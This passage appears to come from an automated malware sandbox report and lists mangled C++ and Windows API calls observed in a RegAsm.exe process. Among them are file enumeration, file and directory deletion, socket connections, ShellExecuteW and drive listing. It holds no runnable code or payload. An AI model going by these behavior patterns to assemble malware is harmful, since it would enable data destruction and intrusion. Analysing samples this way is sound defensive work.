traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE2_2_0040477E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,2_2_00403325
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,2_2_00412BEE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,5_2_00404C0A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,5_2_0040751B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_tr5_2_00410586
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,5_2_0040728F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE5_2_0040477E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,5_2_00403325
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,5_2_00412BEE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00403C4A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$cha2_2_00403C4A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00403C4A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G